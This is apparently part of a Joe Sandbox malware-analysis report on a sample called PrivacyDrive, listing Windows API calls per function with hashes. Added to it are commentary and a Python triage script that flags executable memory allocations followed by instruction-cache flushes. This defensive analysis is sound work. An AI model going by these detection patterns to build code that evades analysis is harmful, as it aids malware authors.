                                • Instruction Fuzzy Hash: 4231F671204706AFD710CF29D984B6AB7E8FF49310F044929F9A4DB3A0DB70E919DBA5
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,00000014,00001000,00000040,?,004A0394,7563D392), ref: 004D44B4
                                • GetCurrentProcess.KERNEL32(?,00000014), ref: 004D4512
                                • FlushInstructionCache.KERNEL32(00000000), ref: 004D4519
                                • __CxxThrowException@8.LIBCMT ref: 004D452E
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocCacheCurrentException@8FlushInstructionProcessThrowVirtual
                                • String ID:
                                • API String ID: 3709139884-0
                                • Opcode ID: 71e273d7a94be286fc0c34758cc5e5905f94dc499e1a164b2308cfb9b7a594c8
                                • Instruction ID: b222feb8e67fb99a3f814bfec14a702971000c057ad641c91edc747636acf3c0
                                • Opcode Fuzzy Hash: 71e273d7a94be286fc0c34758cc5e5905f94dc499e1a164b2308cfb9b7a594c8
                                • Instruction Fuzzy Hash: BF2195742047909FD321DB59D81DF42BBD0AF19715F04858AF6898B7D2C3B4E804CB95
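The entry above is the one worth a closer look in this run of GDI+ helpers: VirtualAlloc is called with lpAddress=0, dwSize=0x14 (20 bytes), flAllocationType=0x1000 (MEM_COMMIT) and flProtect=0x40 (PAGE_EXECUTE_READWRITE), and the same function then calls FlushInstructionCache on the current process. A tiny, writable and executable buffer followed by an instruction-cache flush is the shape of runtime-generated code (a thunk or trampoline written then executed); whether this particular function is a benign GUI-framework thunk or something else is not something the listing alone settles. The arguments after the fourth are stack residue the IDA plugin prints alongside, not parameters. As an added triage example (not part of the Joe Sandbox report or of the analysed sample), the Python below parses "APIs" lines in this report's format and flags executable allocations and the flush that follows them. The sample lines are constructed by copying the entry above plus one benign GDI+ call as a negative case; the regex, the function names and the finding format are this example's own assumptions.

```python
"""Triage helper for Joe Sandbox "APIs" listings (added example, not report code)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample in the shape of the report's "APIs" lines. The first
# four lines mirror the entry at 004D44B4..004D452E above; the last one is a
# benign GDI+ call included as a negative case.
SAMPLE_APIS = """\
• VirtualAlloc.KERNEL32(00000000,00000014,00001000,00000040,?,004A0394,7563D392), ref: 004D44B4
• GetCurrentProcess.KERNEL32(?,00000014), ref: 004D4512
• FlushInstructionCache.KERNEL32(00000000), ref: 004D4519
• __CxxThrowException@8.LIBCMT ref: 004D452E
• GdipGetImageHeight.GDIPLUS(?,?), ref: 00409358
"""

# "<name>.<MODULE>(<args>), ref: <addr>"; the parenthesised argument list is
# optional because CRT entries such as __CxxThrowException@8.LIBCMT lack it.
API_RE = re.compile(
    r"(?P<name>[\w@]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Win32 page-protection constants (low byte; PAGE_GUARD/PAGE_NOCACHE sit above it).
EXEC_PROTECTIONS = {
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_COMMIT = 0x1000


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str] = field(default_factory=list)
    ref: str = ""


def arg_value(arg: str) -> int | None:
    """Hex argument -> int; '?' means the plugin could not resolve it statically."""
    return None if arg == "?" else int(arg, 16)


def parse_api_lines(text: str) -> list[ApiCall]:
    """Parse every API line in a pasted listing; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, m.group("ref")))
    return calls


def flag_runtime_code(calls: list[ApiCall]) -> list[tuple[str, str]]:
    """Return (ref, reason) pairs for executable allocations and a following cache flush.

    Only the first four VirtualAlloc arguments are real parameters
    (lpAddress, dwSize, flAllocationType, flProtect); the plugin prints
    stack residue after them, which is ignored here.
    """
    findings = []
    exec_alloc_seen = False
    for c in calls:
        if c.name == "VirtualAlloc" and len(c.args) >= 4:
            size, alloc_type, protect = (arg_value(a) for a in c.args[1:4])
            name = EXEC_PROTECTIONS.get(protect & 0xFF) if protect is not None else None
            if name:
                exec_alloc_seen = True
                size_txt = f"0x{size:X}" if size is not None else "?"
                commit = " MEM_COMMIT" if alloc_type is not None and alloc_type & MEM_COMMIT else ""
                findings.append((c.ref, f"VirtualAlloc size={size_txt}{commit} flProtect={name}"))
        elif c.name == "FlushInstructionCache" and exec_alloc_seen:
            findings.append((c.ref, "FlushInstructionCache after executable allocation: "
                                    "freshly written bytes are being made executable"))
    return findings


if __name__ == "__main__":
    for ref, reason in flag_runtime_code(parse_api_lines(SAMPLE_APIS)):
        print(f"{ref}: {reason}")
```

Paste any block of "APIs" lines from the report into `parse_api_lines` to apply the same check across functions; the flush check is deliberately order-sensitive, since a FlushInstructionCache with no prior executable allocation in the same function tells you much less.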
                                APIs
                                • _memset.LIBCMT ref: 004BFAF7
                                • EnumDisplayDevicesW.USER32(00000000,00000000,00000348,00000000), ref: 004BFB15
                                • _memset.LIBCMT ref: 004BFB2D
                                • EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 004BFB51
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: DisplayEnum_memset$DevicesSettings
                                • String ID:
                                • API String ID: 393846559-0
                                • Opcode ID: e63ca8833ebd4cda18983cadefa2316590b4b6ff2c1d5f3f6b262b5332a59acf
                                • Instruction ID: 3b8c643780a38a271a85d6bf28069f7aa1eba69d8a6f0cd904ccbf8cec43a959
                                • Opcode Fuzzy Hash: e63ca8833ebd4cda18983cadefa2316590b4b6ff2c1d5f3f6b262b5332a59acf
                                • Instruction Fuzzy Hash: C6216671B002199BDB10DF65DC45BADB7B8FF44314F4085BAE90CD7281EB34AA58CB58
                                APIs
                                • GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                • GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                • GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                • GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$CreateDashDeleteDrawPen1RectangleStyle
                                • String ID:
                                • API String ID: 3237614580-0
                                • Opcode ID: 596aac0cede70a002ed652ac91bdc068e3e4b3e5198298a525b2d2845ae00aa4
                                • Instruction ID: 619d04884841da13c97691cdcbf79b00e93f4e1e79ab35f934c09257ec004dbe
                                • Opcode Fuzzy Hash: 596aac0cede70a002ed652ac91bdc068e3e4b3e5198298a525b2d2845ae00aa4
                                • Instruction Fuzzy Hash: D521F63191474AEFDB01DF65C805BAEBBB4FF5A310F10871AE415B32A0E771A994EB80
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,004347C0,?,00000000,00000000), ref: 004346E8
                                • PostMessageW.USER32(00000000), ref: 0043471D
                                • PostMessageW.USER32(00000000), ref: 0043472D
                                • PostMessageW.USER32(00000000), ref: 0043473D
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePost$CreateThread
                                • String ID:
                                • API String ID: 1266159367-0
                                • Opcode ID: d823e280d65025859753554790f6da093569cbb5b82ebdc6321a09162cd8c4bd
                                • Instruction ID: 8cc3b0a51fcd65b771b9e909ff629f6c459418f429e36cbbda7ef878de64432e
                                • Opcode Fuzzy Hash: d823e280d65025859753554790f6da093569cbb5b82ebdc6321a09162cd8c4bd
                                • Instruction Fuzzy Hash: F7018F31780305BBE7605B59DC0AF9ABBA9EB89B12F200156F604AB3D0DBF578508B94
                                APIs
                                • InitializeCriticalSection.KERNEL32(005BE320), ref: 0040E8EB
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalInitializeSection
                                • String ID: H[$H[$H[
                                • API String ID: 32694325-1837155954
                                • Opcode ID: c7aebc6e4b3a83198371447792bfd2ff78bf29b774be86d5e2ad15fedbbeb864
                                • Instruction ID: b9855ffc058c84e9ca46d1141f946c03c33deff916cfef822f720d3513f22b01
                                • Opcode Fuzzy Hash: c7aebc6e4b3a83198371447792bfd2ff78bf29b774be86d5e2ad15fedbbeb864
                                • Instruction Fuzzy Hash: C721E4B0904384DAE741CF54E94A7EDBFF0BB11718F6C4A58E4116B390C3B93A4CAB91
                                APIs
                                • EnterCriticalSection.KERNEL32(?), ref: 00409646
                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0040965F
                                • QueryPerformanceCounter.KERNEL32(?), ref: 00409669
                                • LeaveCriticalSection.KERNEL32(?), ref: 004096C6
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalPerformanceQuerySection$CounterEnterFrequencyLeave
                                • String ID:
                                • API String ID: 95068880-0
                                • Opcode ID: c1abe6072d92c916122f8629979ac2178d974c793c7b23b83189686a9ff3147b
                                • Instruction ID: 0b67c4b35b9f983c7b10185d109a282aad021f786903e7976e4891913ca14e31
                                • Opcode Fuzzy Hash: c1abe6072d92c916122f8629979ac2178d974c793c7b23b83189686a9ff3147b
                                • Instruction Fuzzy Hash: BD116D36D00F0D9BC712EFB4C8654AFF779BF5A381B108716E80672621EB30A586DB90
                                APIs
                                • SetEvent.KERNEL32(?,7563D392,00000000,00000000,?,0053E5DF,000000FF,?,004772AB,?,?,004771AD,00000001), ref: 004317B6
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,004772AB,?,?,004771AD,00000001), ref: 004317C1
                                • DeleteCriticalSection.KERNEL32(00000088,7563D392,00000000,00000000,?,0053E5DF,000000FF,?,004772AB,?,?,004771AD,00000001), ref: 004317D2
                                • DeleteCriticalSection.KERNEL32(00000038,?,004772AB,?,?,004771AD,00000001), ref: 004317F6
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalDeleteSection$EventObjectSingleWait
                                • String ID:
                                • API String ID: 3461137121-0
                                • Opcode ID: 6748f4d44dc4d50006911c3472061da65a69049d66e22d7dc00ca2eaa64093fa
                                • Instruction ID: 312aabd15dd19868a472a8003377af609e2d142412e2ce9af3f6ac4be44942b1
                                • Opcode Fuzzy Hash: 6748f4d44dc4d50006911c3472061da65a69049d66e22d7dc00ca2eaa64093fa
                                • Instruction Fuzzy Hash: A3114F75804704DFD710CFA4D808B9ABBF8FB09724F10475EE466936D0DBB56508DB80
                                APIs
                                • GetParent.USER32(00000000), ref: 00444787
                                • SetWindowPos.USER32(00000000), ref: 0044478E
                                • GetParent.USER32(00000000), ref: 004447A8
                                • SetWindowPos.USER32(00000000), ref: 004447AF
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ParentWindow
                                • String ID:
                                • API String ID: 3530579756-0
                                • Opcode ID: 42f94c353c819ef089b1f4b96bb8e289d71d1c5a22e3e814b417eef4dec2cd4d
                                • Instruction ID: 689c1b5557c08a502fa67d8a854d673dc3e0cf94cfd9766299e1bbfbc7d27fe1
                                • Opcode Fuzzy Hash: 42f94c353c819ef089b1f4b96bb8e289d71d1c5a22e3e814b417eef4dec2cd4d
                                • Instruction Fuzzy Hash: A5F03A75340300ABEB50ABA8DCCDF1637A8BB19B12F404465F205DF2D2C6A9E8849B20
                                APIs
                                • PostMessageW.USER32(00000000,?,00000000,00000000), ref: 0043477E
                                • PostMessageW.USER32(00000000,?,00000000,00000000), ref: 00434790
                                • PostMessageW.USER32(00000000,?,00000000,00000000), ref: 004347A2
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,00477265,7563D392,?,00000000,?,0053EB6B,000000FF,?,0047716E,00000001), ref: 004347AC
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePost$ObjectSingleWait
                                • String ID:
                                • API String ID: 3891836223-0
                                • Opcode ID: e364dde6b3e4b5aa2088c1bdc537ad6c38bdc358620cae1467779c4b3705d138
                                • Instruction ID: 4fee9673e0430d2affbe9e6b6737d69ae55853fce93c2e293958b55722791483
                                • Opcode Fuzzy Hash: e364dde6b3e4b5aa2088c1bdc537ad6c38bdc358620cae1467779c4b3705d138
                                • Instruction Fuzzy Hash: 28013C35240314ABDF509F95CC89FC67B64EB08725F1441A1BA089F1E6CBF0A884CBA0
                                APIs
                                • ShowWindow.USER32(?,?,?,00489CEF,-00000005), ref: 004D4869
                                • PostMessageW.USER32(?,00000112,0000F120,00000000), ref: 004D4882
                                • PostMessageW.USER32(?,00000112,0000F020,00000000), ref: 004D489B
                                • PostMessageW.USER32(?,00000112,0000F030,00000000), ref: 004D48B4
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePost$ShowWindow
                                • String ID:
                                • API String ID: 928190103-0
                                • Opcode ID: 19b0d7360b4a26854c8cae59c0cabf60fa56f4d3ed5e3427083f7e25d17a63aa
                                • Instruction ID: e34f6ce598d2351c28fb393475d967a754460403ee69147af5dd5b574621f4b5
                                • Opcode Fuzzy Hash: 19b0d7360b4a26854c8cae59c0cabf60fa56f4d3ed5e3427083f7e25d17a63aa
                                • Instruction Fuzzy Hash: 6FF0BE72180308E7E6241B90FC1AFA97629DB28B15F208423F304A85F283B29839F608
                                APIs
                                • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                  • Part of subcall function 00436AE0: WideCharToMultiByte.KERNEL32(76ECFFB0,00000000,?,000000FF,?,?,00000000,00000000,?,?,004C27B9,?,00000003,?,00583B28,00000000), ref: 00436B01
                                • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,?,00571F54,00000000,?,0056C344,7563D392,7563D392,76ECFFB0), ref: 004C2822
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide
                                • String ID: v
                                • API String ID: 626452242-3261393531
                                • Opcode ID: aa1059905902807c932c4b742497ec450df12eddd552b9279fa6f7977f568d2d
                                • Instruction ID: bc7e3dfac5ddef5d83bb0b5f5abfd24ce00b016c9a10128345e9228d8def854f
                                • Opcode Fuzzy Hash: aa1059905902807c932c4b742497ec450df12eddd552b9279fa6f7977f568d2d
                                • Instruction Fuzzy Hash: 88C1E379A00215DBDF60DFA8C945B9FBBB4BF48714F24022ED801B7281D7F49A05CBA4
                                APIs
                                  • Part of subcall function 00412230: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00412288
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,00000007,7563D392,EFFFFFFF,00000000), ref: 004A2187
                                  • Part of subcall function 004A2510: EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A232A,00403019), ref: 004A2520
                                  • Part of subcall function 004A2510: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004A2538
                                  • Part of subcall function 004A2510: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,BASE_DIALOG), ref: 004A2565
                                  • Part of subcall function 004A2510: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004A2577
                                  • Part of subcall function 004A2510: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,00000000,BASE_DIALOG), ref: 004A25A4
                                  • Part of subcall function 004A2510: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004A25B6
                                • __CxxThrowException@8.LIBCMT ref: 004A2357
                                  • Part of subcall function 004A27F0: TryEnterCriticalSection.KERNEL32(005BDCCC,?,004A2335,00403019), ref: 004A27F8
                                  • Part of subcall function 004A27F0: LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,MESSAGE_BOX), ref: 004A281F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$Concurrency::details::_Concurrent_queue_base_v4::_CreateException@8FormatGdipInternal_throw_exceptionStringThrow
                                • String ID: !@
                                • API String ID: 1383318732-1028639617
                                • Opcode ID: d3fdda6977b5add1d8449eff889fc7f63bc45f5e4cbb85ecbf298274748bdbb1
                                • Instruction ID: 52ee6c17c7c72821ccf08dbd61eef8e3dc6c6fb30ec650336ffc7aa70918cd5f
